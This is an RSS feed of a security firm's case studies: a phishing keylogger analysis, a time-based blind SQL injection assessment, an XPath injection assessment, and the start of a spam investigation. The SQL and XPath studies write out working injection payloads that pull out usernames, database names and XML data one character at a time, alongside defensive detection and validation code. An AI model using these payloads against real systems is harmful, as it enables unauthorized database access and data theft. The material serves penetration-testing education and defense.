<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Case Studies &#8211; Torrid Networks</title>
	<atom:link href="https://www.torridnetworks.com/category/case-studies/feed" rel="self" type="application/rss+xml" />
	<link>https://www.torridnetworks.com</link>
	<description>A Cyber Security Consulting Firm</description>
	<lastBuildDate>Mon, 09 May 2016 10:15:27 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=4.5.1</generator>
	<item>
		<title>Hackers tricking UAE companies to make payments to foreign bank accounts &#8211; A real-world case study</title>
		<link>https://www.torridnetworks.com/resources/case-studies/hackers-tricking-uae-companies-make-payment-foreign-bank-accounts-real-world-case-study</link>
		<pubDate>Tue, 12 Jan 2016 07:47:17 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>

		<guid isPermaLink="false">https://www.torridnetworks.com/?p=3247</guid>
		<description><![CDATA[<p>This case study is in continuation to the press release published at: https://www.torridnetworks.com/press-events/press-releases/uae-companies-being-targeted-by-the-hackers The entire incident was started with an email sent from a spoofed email address fundtransferdpt@hsbc.com to the victim working in the accounts department of the company. Email contents were convincing enough for any accounts person to open the attachment. Victim was on&#8230;</p>
]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;">This case study continues the press release published at: <a href="https://www.torridnetworks.com/press-events/press-releases/uae-companies-being-targeted-by-the-hackers" target="_blank">https://www.torridnetworks.com/press-events/press-releases/uae-companies-being-targeted-by-the-hackers</a></p>
<p style="text-align: justify;" align="justify">The entire incident started with an email sent from the spoofed address <a href="mailto:fundtransferdpt@hsbc.com">fundtransferdpt@hsbc.com</a> to the victim, who worked in the accounts department of the company. The email contents were convincing enough for any accounts person to open the attachment. The victim was on Google Apps for corporate email, which did not block the malware hidden inside the attached file with the .ace extension, a compressed file format like WinZip. The malware file was named Wire Advise_HSBC0000079652pdf.exe and carried a PDF icon. With the default Windows setting of hiding known extensions, the file looks like a perfectly normal PDF document to an ordinary user.</p>
<p style="text-align: justify;" align="justify">Before proceeding to static analysis or reverse engineering, we decided to perform a quick dynamic analysis of the malware. Although it was partially undetected by antivirus systems, the malware turned out to be very basic in nature, with no sophisticated mechanisms involved.</p>
<p style="text-align: justify;" align="justify">On execution, the malware installs itself into the user's Roaming folder, as can be seen in the screenshot below.</p>
<p style="text-align: justify;" align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/raoming.png" rel="attachment wp-att-3253"><img class=" wp-image-3253 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/raoming.png" alt="raoming" width="556" height="269" /></a></p>
<p align="justify">Since it uses no process injection or rootkit techniques to hide itself, the malware is easily seen in Task Manager, although the process name might trick an ordinary user into believing it is a legitimate process.</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/TaskManager.png" rel="attachment wp-att-3254"><img class="wp-image-3254 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/TaskManager.png" alt="TaskManager" width="436" height="280" /></a></p>
<p align="justify">Once running, the malware records keystrokes, screenshots and browser cache, and uploads the recorded data to its operator via email every 40 minutes.</p>
<p align="justify">The destination email address, the SMTP relay address and the credentials were hard-coded in the malware. The SMTP port used for the upload was 587 rather than the standard port 25, possibly to bypass firewall rules. The mail server is hosted with GoDaddy and appears to be owned by the attacker, since the SMTP relay used to upload the data is the same host as the MX for the destination email address.</p>
<p align="justify">A few of the screenshots below give more information on the attacker's infrastructure, which definitely does not look like a professional hacker's setup.</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/nmap.png" rel="attachment wp-att-3255"><img class="wp-image-3255 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/nmap.png" alt="nmap" width="385" height="367" /></a></p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/whois.png" rel="attachment wp-att-3256"><img class=" wp-image-3256 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/whois.png" alt="whois" width="376" height="618" /></a></p>
<p align="justify">It appears that the attacker has been in business for a while, as can be seen from this VirusTotal <a href="https://www.virustotal.com/en/ip-address/104.238.94.101/information/" target="_blank">link</a> and the screenshot below:</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/virustotal.png" rel="attachment wp-att-3257"><img class="wp-image-3257 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/virustotal.png" alt="virustotal" width="655" height="493" /></a></p>
<p align="justify">Interestingly, GoDaddy has not been able to spot the suspicious email traffic in its network and take down the botnet CnC.</p>
<p align="justify">The malware generates the following traffic when executed on the system.</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/wireshark.png" rel="attachment wp-att-3258"><img class="wp-image-3258 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/wireshark.png" alt="wireshark" width="830" height="316" /></a></p>
<p align="justify">Such a mechanism is not expected from a serious, sophisticated malware. In the traffic, the SMTP username and password can be seen as base64-encoded strings, which are easily decoded as shown below:</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/base64.png" rel="attachment wp-att-3259"><img class=" wp-image-3259 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/base64.png" alt="base64" width="354" height="304" /></a></p>
<p>Similarly, the password was also extracted. Given the nature of the task, the password is masked in the traffic to discourage any misuse of the information.</p>
<p>The attacker does not seem to be a pro, as is visible from the nice-looking webmail interface he uses to monitor his bots.</p>
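<p style="text-align: justify;">As an added illustration (not part of the original case study), the following Python script shows how a defender could spot the two traits described above in network telemetry: the periodic SMTP beacon to an external relay on port 587, and the base64 AUTH LOGIN username visible in the session. The flow records, IP addresses and username are constructed for this example.</p>

```python
"""Detection of the exfiltration pattern described above: a workstation making
periodic outbound SMTP submissions (port 587) to an external relay and
authenticating with AUTH LOGIN, whose base64 username is visible in clear.
All flow records and SMTP transcript lines below are constructed samples."""
import base64
from collections import defaultdict
from datetime import datetime

# Constructed flow records (timestamp, src, dst, dport); not from the original capture.
FLOWS = [
    ("2016-01-05 09:00:12", "10.0.0.15", "203.0.113.25", 587),
    ("2016-01-05 09:40:09", "10.0.0.15", "203.0.113.25", 587),
    ("2016-01-05 10:20:14", "10.0.0.15", "203.0.113.25", 587),
    ("2016-01-05 11:00:11", "10.0.0.15", "203.0.113.25", 587),
    ("2016-01-05 09:05:00", "10.0.0.15", "10.0.0.5", 443),        # ordinary internal traffic
    ("2016-01-05 09:07:00", "10.0.0.20", "198.51.100.7", 587),    # one-off submission, not periodic
]


def beaconing_smtp_submissions(flows, min_hits=3, tolerance_s=120):
    """Return {(src, dst): mean_interval_minutes} for pairs that connect to port 587
    at a near-constant interval. The malware above uploaded every 40 minutes; this
    looks for any regular cadence whose gaps vary by at most tolerance_s seconds."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == 587:
            by_pair[(src, dst)].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
    suspects = {}
    for pair, times in by_pair.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= tolerance_s:
            suspects[pair] = round(sum(gaps) / len(gaps) / 60)
    return suspects


# Constructed SMTP transcript as it would appear in a capture ("S:" server, "C:" client).
SMTP_SESSION = [
    "S: 220 mail.example.invalid ESMTP",
    "C: EHLO victim-pc",
    "C: AUTH LOGIN",
    "S: 334 VXNlcm5hbWU6",                 # base64 for "Username:"
    "C: bG9nc0BleGFtcGxlLmludmFsaWQ=",     # constructed username, base64-encoded
    "S: 334 UGFzc3dvcmQ6",                 # base64 for "Password:"
    "C: ********",                         # masked, as in the case study
]


def auth_login_username(lines):
    """Decode the base64 username a client sends after the server's
    '334 VXNlcm5hbWU6' prompt; None if no AUTH LOGIN username is present."""
    expecting = False
    for line in lines:
        if line.startswith("S: 334 VXNlcm5hbWU6"):
            expecting = True
        elif expecting and line.startswith("C: "):
            try:
                return base64.b64decode(line[3:], validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


if __name__ == "__main__":
    print(beaconing_smtp_submissions(FLOWS))
    print(auth_login_username(SMTP_SESSION))
```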
<p><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/webmail.png" rel="attachment wp-att-3260"><img class="wp-image-3260 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/webmail.png" alt="webmail" width="629" height="307" /></a></p>
<p>And it is even more evident from the control panel he might be using to manage the server:</p>
<p style="text-align: justify;"><img class="wp-image-4098 aligncenter" src="http://www.torridnetworks.com/wp-content/uploads/2016/01/cpanel.png" alt="cpanel" width="840" height="306" srcset="http://www.torridnetworks.com/wp-content/uploads/2016/01/cpanel.png 1385w, http://www.torridnetworks.com/wp-content/uploads/2016/01/cpanel-300x109.png 300w, http://www.torridnetworks.com/wp-content/uploads/2016/01/cpanel-768x279.png 768w, http://www.torridnetworks.com/wp-content/uploads/2016/01/cpanel-1024x373.png 1024w" sizes="(max-width: 840px) 100vw, 840px" /></p>
<p>His mailbox holds a lot of emails, and a lot of victims:</p>
<p><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/mailaccess.png" rel="attachment wp-att-3262"><img class="wp-image-3262 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/mailaccess.png" alt="mailaccess" width="747" height="358" /></a></p>
<p>A sample email with keylogs containing some UAE business details. We have masked the details out of respect for the victim's privacy.</p>
<p><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/keylogs.png" rel="attachment wp-att-3263"><img class="wp-image-3263 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/keylogs.png" alt="keylogs" width="732" height="303" /></a></p>
<p align="justify">A sample screenshot of a transaction can be seen below:</p>
<p align="justify"><a href="https://www.torridnetworks.com/wp-content/uploads/2016/01/screenshot.png" rel="attachment wp-att-3264"><img class="wp-image-3264 aligncenter" src="https://www.torridnetworks.com/wp-content/uploads/2016/01/screenshot.png" alt="screenshot" width="634" height="337" /></a></p>
<p align="justify">Apart from this, there were numerous emails with victims' net banking details and credentials for social media, email and other portals.</p>
<p align="justify">In conclusion, the analysis suggests that the attacker is more of a scammer from Nigeria (as per the domain registration records) than a professional hacker: someone who may be excellent at social engineering users but is definitely not much into hacking.</p>
<p align="justify">Torrid Networks helped its client by investigating the entire case, provided a complete report including the root cause of the issue, and implemented strong security controls to avoid such cyber attacks in the future. We hope this case study is helpful to others in knowing the unknown.</p>
<p align="justify">Readers are welcome to send us comments or feedback at <a href="mailto:info@torridnetworks.com">info@torridnetworks.com</a></p>
]]></content:encoded>
			</item>
		<item>
		<title>SQL Injection All Over &#8211; Application Security Assessment for a Nodal Agency</title>
		<link>https://www.torridnetworks.com/resources/case-studies/sql-injection-all-over-application-security-assessment-for-a-nodal-agency</link>
		<pubDate>Mon, 24 Aug 2015 04:00:28 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[Black Box Testing]]></category>
		<category><![CDATA[government security]]></category>
		<category><![CDATA[government website]]></category>
		<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://www.torridnetworks.com/?p=1442</guid>
		<description><![CDATA[<p>Torrid Networks was recently engaged in web application security assessment for a top nodal agency processing highly classified information. Along with few common misconfigurations, some serious security issues were detected in the web application security assessment. The quick and weakest link was the admin credential used by the webmaster which was brute forced in no&#8230;</p>
]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;">Torrid Networks was recently engaged in a web application security assessment for a top nodal agency processing highly classified information.</p>
<p style="text-align: justify;">Along with a few common misconfigurations, some serious security issues were detected during the assessment. The quickest and weakest link was the admin credential used by the webmaster, which was brute-forced in no more than five minutes. Apart from a few other commonly found vulnerabilities that were reported, the interesting part was a time-based blind SQL injection, which took a while to turn into free access to the backend database.</p>
<h3 style="text-align: justify;">Approach</h3>
<p style="text-align: justify;">Automated application security assessment tools have limited space in Torrid Networks' application security assessment methodology, most of which relies on manual security testing of the applications. A quick automated scan against this particular application did show a few basic results, which were verified against false positives and noted. The next stage of manual security testing discovered a few more vulnerabilities and also raised the probability of a time-based SQL injection vulnerability in the application. The data stored and processed in the application was of very high importance and confidentiality, hence the SQL injection vulnerability was an eye opener.</p>
<p style="text-align: justify;">A series of tests was performed to collect objective evidence for the presence of the time-based SQL injection vulnerability.</p>
<h3 style="text-align: justify;">Observation</h3>
<p style="text-align: justify;">It was found that the application generated a parameter named “suid” in response to the SubmitQuery request made by the user. During the data validation testing stage, a time-based SQL injection payload was injected and the application responded positively. The detailed observations are summarized below:</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">First Payload:</span></p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27waitfor delay'0:0:10'--</pre>
<p style="text-align: justify;">The application responded in 13.87 sec, with some raw ID output on the screen.</p>
<p style="text-align: justify;">In the next attack vector, the delay was increased to 20 sec to verify.</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Second Payload: </span></p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27waitfor delay'0:0:20'--</pre>
<p style="text-align: justify;">The application responded in 24.23 sec, with some raw ID on the screen.</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Third Payload:</span></p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27waitfor delay'0:0:30'--</pre>
<p style="text-align: justify;">The application responded in 34.16 sec.</p>
<p style="text-align: justify;">By this time it was evident that user-supplied input was being executed on the server side and that the user could control the application's behavior.</p>
<h3 style="text-align: justify;">Exploitation</h3>
<p style="text-align: justify;">Time-based SQL injection usually needs more time to exploit than error-based SQL injection, which is mostly very quick to exploit. The basic approach is to test a condition that leads to a TRUE or FALSE response and, based on the database's response, guess values character by character. Exploitation of this vulnerability produced some really useful results that helped build a business case for the customer. The exploitation is divided into smaller objectives, described below:</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Objective I: To obtain the database user name length</span></p>
<p style="text-align: justify;">To obtain the database user name, it was first required to guess the length of the username by sending the following request to the server:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27if (len(user)=1)waitfor delay'0%3a0%3a20'--</pre>
<p style="text-align: justify;">The application responded in less than 20 sec, which meant that the condition tested was not true. Similarly, further requests with varying user lengths were sent until a positive response was obtained for len(user)=7:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27if(len(user)=7)waitfor delay'0%3a0%3a20'--</pre>
<p style="text-align: justify;">The application responded after 20 sec, confirming the condition len(user)=7 to be true.</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Objective II: To obtain username</span></p>
<p style="text-align: justify;">To obtain the username, it was required to guess the characters one by one. First, a condition was tested to determine whether the first character of the username is lowercase or uppercase. The crafted request to test the condition is as below:</p>
<pre class="brush: html; gutter: true; first-line: 1">if (ascii(lower(substring((user),1,1)))&gt;97) WAITFOR DELAY '00:00:10'--</pre>
<p style="text-align: justify;">The application responded with a positive result.</p>
<p style="text-align: justify;">Now it was time to get rolling and discover the username. The following query was submitted to the database via the application interface:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),1,1)))&gt;100)waitfor%20delay%270%3a0%3a20%27--</pre>
<p style="text-align: justify;">The application responded before 20 sec, which meant the condition was not true and the value being guessed was in fact between 97 and 100.</p>
<p style="text-align: justify;">A similar request was crafted, this time checking for an equality condition:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),1,1)))=99)waitfor%20delay%270%3a0%3a20%27--</pre>
<p style="text-align: justify;">The application responded in 24 sec, indicating that the first character of the username is “c”.</p>
<p style="text-align: justify;">Likewise, a series of tests was performed to get the second character by observing the application's response time. For the ASCII value 117, the test responded positively:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),2,1)))=117)waitfor%20delay'0%3a0%3a20'--</pre>
<p style="text-align: justify;">Therefore the second character was confirmed to be “u”.</p>
<p style="text-align: justify;">A series of similar tests was performed to obtain the complete username.</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Objective III: To obtain database name length.</span></p>
<p style="text-align: justify;">To exploit further, it was required to obtain the length of the database name. Similar tests with different attack vectors led to the length of the database name, as shown below:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (len(db_name())=6)waitfor%20delay'00:00:20'--</pre>
<p style="text-align: justify;">The application responded in 24.82 sec, confirming the database name length to be 6.</p>
<p style="text-align: justify;"><span style="text-decoration: underline;">Objective IV: To obtain database name</span></p>
<p style="text-align: justify;">The attack vector would definitely vary, but the approach is the same as used in collecting the username:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ASCII(lower(substring((db_name()),1,1)))&gt;108)waitfor%20delay%270%3a0%3a20%27--</pre>
<p style="text-align: justify;">The condition was true, which meant that the first character of the name comes after “l”. Another test condition used was:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ASCII(lower(substring((db_name()),1,1)))&gt;116)waitfor%20delay%270%3a0%3a20%27--</pre>
<p style="text-align: justify;">The result of this condition was false, so the next tests were crafted for each character between ‘l’ and ‘t’, and a positive result was found for ASCII value 115, which is the character ‘s’:</p>
<pre class="brush: html; gutter: true; first-line: 1">http://www.victim.com/querysave.aspx?quis=f848cfe6-74d7-4a32-92d7-6c5c16e16733'if (ASCII(lower(substring((db_name()),1,1)))=115)waitfor%20delay%270%3a0%3a20%27--</pre>
<p style="text-align: justify;">The response confirmed the first character as ‘s’. Further tests with varied payloads discovered the complete database name.</p>
<p style="text-align: justify;">Further exploitation was done to retrieve some test records from the database as a PoC.</p>
<h3 style="text-align: justify;">Conclusion</h3>
<p style="text-align: justify;">Gathering the objective evidence collected via SQL injection and the other security tests, a comprehensive report was presented to the customer. The development team was walked through mitigation techniques, and a quick technical session on how to avoid such security bugs in future application development was offered and well received by the development team.</p>
<p style="text-align: justify;">It is recommended to implement a proper data validation mechanism to validate and restrict input data from any source. Data validation is the first line of defense against SQL injection attacks.</p>
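<p style="text-align: justify;">As an added example (not the assessed application's code or Torrid Networks' own tooling), the Python below shows the two defensive sides of what this case study describes: a strict whitelist check for the suid parameter, which should only ever carry an identifier, and a scan of web server access logs that flags the WAITFOR DELAY and IF(LEN/ASCII(...)) probes used above, correlated with the server's time-taken field so that a fired delay (the TRUE branch) stands out. The log lines are constructed, and the identifier pattern is assumed to be a canonical 8-4-4-4-12 GUID; adjust it to whatever format the application actually issues.</p>

```python
"""Defensive checks for the time-based blind SQL injection described above:
a whitelist check for the 'suid' parameter and a log scanner that flags
time-delay probes. Log lines are constructed samples, not real logs."""
import re
import urllib.parse

# Assumed identifier format: canonical GUID. Anything else is rejected, not sanitized.
GUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$")

# Patterns typical of MSSQL time-based probes, matched after URL decoding.
PROBE_RE = re.compile(r"waitfor\s*delay|if\s*\(\s*(len|ascii)\s*\(", re.IGNORECASE)

# Constructed IIS-style lines: "method uri-stem uri-query time-taken(ms)".
LOG_LINES = [
    "GET /querysave.aspx suid=12345678-1234-1234-1234-123456789abc 120",
    "GET /querysave.aspx suid=12345678-1234-1234-1234-123456789abc%27if(len(user)=7)waitfor%20delay%270%3a0%3a20%27-- 20310",
    "GET /querysave.aspx suid=12345678-1234-1234-1234-123456789abc%27waitfor%20delay%270:0:10%27-- 13870",
    "GET /querysave.aspx suid=12345678-1234-1234-1234-123456789abc%27if(len(user)=1)waitfor%20delay%270%3a0%3a20%27-- 210",
]


def valid_suid(value):
    """Whitelist validation: accept only a canonical GUID."""
    return bool(GUID_RE.match(value))


def _delay_seconds(payload):
    """Requested delay in seconds from a WAITFOR DELAY 'h:m:s' literal, or None."""
    m = re.search(r"delay\s*'(\d+):(\d+):(\d+)'", payload, re.IGNORECASE)
    if not m:
        return None
    h, mi, s = map(int, m.groups())
    return h * 3600 + mi * 60 + s


def scan_log(lines, slow_ms=5000):
    """One finding per request whose suid fails the whitelist or carries a probe.
    'slow' is True when the response took at least slow_ms, i.e. the injected
    delay actually fired, which is the TRUE branch of the attacker's condition."""
    findings = []
    for line in lines:
        method, path, query, time_taken = line.split()
        # parse_qs splits each pair on the first '=' only, so '=' inside the
        # payload (len(user)=7) stays part of the value; it also URL-decodes.
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        suid = params.get("suid", [""])[0]
        probe = bool(PROBE_RE.search(suid))
        if valid_suid(suid) and not probe:
            continue
        findings.append({
            "path": path,
            "probe": probe,
            "slow": int(time_taken) >= slow_ms,
            "delay": _delay_seconds(suid),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f)
```

A request that is both a probe and slow is the signal to act on: the attacker's condition evaluated true, so extraction is in progress rather than merely attempted.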
<p style="text-align: justify;">To know more, feel free to write to us at <a href="mailto:info@torridnetworks.com">info@torridnetworks.com</a></p>
]]></content:encoded>
			</item>
		<item>
		<title>XPATH Injection, Telecom X-Factor &#8211; Application Security Case Study</title>
		<link>https://www.torridnetworks.com/resources/case-studies/xpath-injection-telecom-x-factor-application-security-case-study</link>
		<pubDate>Wed, 03 Jun 2015 10:19:53 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>

		<guid isPermaLink="false">http://www.torridnetworks.com/?p=1718</guid>
		<description><![CDATA[<p>During a recent engagement to audit an application for a large telecom provider, Torrid Networks&#8217; expert application security team encountered few XPATH injections in the application. The application was though also observed to contain many of the common vulnerabilities including cross-site scripting, iframe injections, information leakage, etc. but the XPATH injection added some interest to&#8230;</p>
]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;">During a recent engagement to audit an application for a large telecom provider, Torrid Networks&#8217; expert application security team encountered a few XPATH injections in the application. The application was also observed to contain many of the common vulnerabilities, including cross-site scripting, iframe injection and information leakage, but the XPATH injection added some interest to the assignment, since the application used XML to store data and XPath to query it.</p>
<h4 style="text-align: justify;"><strong>Approach</strong></h4>
<p><a href="http://www.torridnetworks.com/wp-content/uploads/2013/06/xml.gif"><img class="alignleft  wp-image-1723" alt="xml" src="http://www.torridnetworks.com/wp-content/uploads/2013/06/xml.gif" width="140" height="140" /></a>XPATH injections are a bit more difficult to identify and harder to exploit than SQL injection, and automated tools add further to the difficulty, hence the team did not rely on automated tools during this test. We followed our application security methodology, which favors manual application security testing over automated testing.</p>
<p>When the application was passed the magic quote ['], it responded in an unusual manner that immediately made our analysts think of a typical SQL injection. But a quick examination of the exception thrown to the browser, which included the XML document structure, revealed the possible presence of XPATH injection.</p>
<h4 style="text-align: justify;"><strong>Exploitation</strong></h4>
<p style="text-align: justify;">Having identified the XPath queries' True and False behavior, the application was injected with various queries to extract data.</p>
<p style="text-align: justify;"><strong>Extract the XPath version:</strong></p>
<p style="text-align: justify;">There are two versions of XPath, version 1 and version 2. To detect which version the application supports, we used the lower-case() function as follows:</p>
<p style="text-align: justify;">' and lower-case('A')='a</p>
<p style="text-align: justify;">An error was generated, which led us to conclude that it was version 1, as that does not support the lower-case() function.</p>
<p style="text-align: justify;">The XML data is stored as a tree, and extraction requires node-by-node traversal.</p>
<p style="text-align: justify;"><strong>Extract the parent node:</strong></p>
<p style="text-align: justify;">To extract the first letter of the parent node, we injected:</p>
<p style="text-align: justify;">' or substring(name(parent::*[position()=1]),1,1)='a</p>
<p style="text-align: justify;">And we got results (i.e. True behavior), which showed that the first letter of the parent node was ‘a’.</p>
<p style="text-align: justify;">To extract the second letter of the parent node, we injected a series of queries:</p>
<p style="text-align: justify;">' or substring(name(parent::*[position()=1]),2,1)='a</p>
<p style="text-align: justify;">' or substring(name(parent::*[position()=1]),2,1)='b</p>
<p style="text-align: justify;">' or substring(name(parent::*[position()=1]),2,1)='c</p>
<p style="text-align: justify;">' or substring(name(parent::*[position()=1]),2,1)='d</p>
<p style="text-align: justify;">It was confirmed that the second letter was ‘d’, as the last query generated results (i.e. True).</p>
<p style="text-align: justify;">Following the same procedure, we extracted the full name of the parent node, which was found to be ‘address’.</p>
<p style="text-align: justify;"><strong>Count Nodes:</strong></p>
<p style="text-align: justify;">To count the number of child nodes, the following query was injected:</p>
<p style="text-align: justify;">' and count(/*)=4 and '1'='1</p>
<p style="text-align: justify;">This generated no error, which confirmed that there were 4 child nodes. Here ‘/*’ is used to iterate through all the nodes.</p>
<p style="text-align: justify;">Having established the name of the “address” node, we then cycled through each of its child nodes, extracting all their names and values.</p>
<p style="text-align: justify;">By cycling through every child node of every address node and extracting their values one character at a time, the entire contents of the XML data store were extracted.</p>
<h4 style="text-align: justify;"><strong>Conclusion</strong></h4>
<p style="text-align: justify;">After compiling a detailed analysis and the proof-of-concept collected via XPATH injection and the other security tests, a comprehensive report was presented to the customer. The development team was walked through mitigation techniques, and a quick technical session on how to avoid such security bugs in future application development was offered and well received by the development team.</p>
<p style="text-align: justify;">It is recommended that user input be checked against a whitelist of acceptable characters, which should ideally include only alphanumeric characters. Characters that may be used to interfere with the XPath query should be blocked, including ( ) = ' [ ] : , * /. Any input that does not match the whitelist should be rejected, not sanitized.</p>
<p style="text-align: justify;">To know more, feel free to write to us at <a href="mailto:info@torridnetworks.com">info@torridnetworks.com</a></p>
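<p style="text-align: justify;">The whitelist recommendation above, applied in working code as an added example (not the telecom application's code): a lookup against an XML store shaped like the one in the case study, with address nodes of four children each, that refuses any field or value failing the whitelist before it can reach the XPath predicate. The XML document, field names and the use of Python's ElementTree are assumptions made for the example.</p>

```python
"""Whitelist validation for XPath query inputs, as recommended above, in front of
a lookup on an XML store. The data and field names are constructed for this example."""
import re
import xml.etree.ElementTree as ET

# Constructed data store: four child nodes per <address>, mirroring count(/*)=4 above.
XML_STORE = """<addresses>
  <address><name>alice</name><street>HighSt</street><city>Delhi</city><zip>110001</zip></address>
  <address><name>bob</name><street>ParkRd</street><city>Mumbai</city><zip>400001</zip></address>
</addresses>"""

ALLOWED_FIELDS = {"name", "street", "city", "zip"}   # the only child node names we will query
WHITELIST_RE = re.compile(r"^[A-Za-z0-9]+$")         # alphanumeric only, as recommended
# Characters the case study lists as able to interfere with an XPath query.
XPATH_META = set("()='[]:,*/")


class RejectedInput(ValueError):
    """Raised instead of sanitizing: input that fails the whitelist is refused outright."""


def is_safe_value(value):
    """True only if value is non-empty and purely alphanumeric."""
    return bool(WHITELIST_RE.match(value))


def offending_chars(value):
    """Which of the listed XPath metacharacters an input contains, for the rejection log entry."""
    return sorted(set(value) & XPATH_META)


def find_address(root, field, value):
    """Look up <address> nodes by one child field. Both the field and the value are
    validated before being placed in the predicate, so the True/False probes from the
    case study (quotes, parentheses, '=' and '/') never reach the XPath engine."""
    if field not in ALLOWED_FIELDS:
        raise RejectedInput(f"unknown field {field!r}")
    if not is_safe_value(value):
        raise RejectedInput(f"value contains {offending_chars(value)}")
    return root.findall(f"./address[{field}='{value}']")


def lookup_cities(field, value):
    """Cities of the addresses matching field=value, or RejectedInput for bad input."""
    root = ET.fromstring(XML_STORE)
    return [a.findtext("city") for a in find_address(root, field, value)]


def is_rejected(field, value):
    """Does the lookup refuse this input? (Convenience for callers and tests.)"""
    try:
        lookup_cities(field, value)
        return False
    except RejectedInput:
        return True


if __name__ == "__main__":
    print(lookup_cities("name", "alice"))
    print(is_rejected("name", "' or substring(name(parent::*[position()=1]),1,1)='a"))
```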
]]></content:encoded>
			</item>
		<item>
		<title>Investigating SPAM Issues – The unauthentic way!</title>
		<link>https://www.torridnetworks.com/resources/case-studies/investigating-spam-issues-the-unauthentic-way</link>
		<pubDate>Fri, 20 Mar 2015 06:54:06 +0000</pubDate>
		<dc:creator><![CDATA[torridadmin]]></dc:creator>
				<category><![CDATA[Case Studies]]></category>

		<guid isPermaLink="false">http://www.torridnetworks.com/?p=836</guid>
		<description><![CDATA[<p>Torrid Networks was recently engaged by a large software company to investigate the rising spam issues with their corporate mail server. Company had over 2500 mailboxes with a software based anti-spam solution. The same solution was running from quite a while without any trouble, however spam levels soared recently. Moreover, the spam coming to user&#8230;</p>
]]></description>
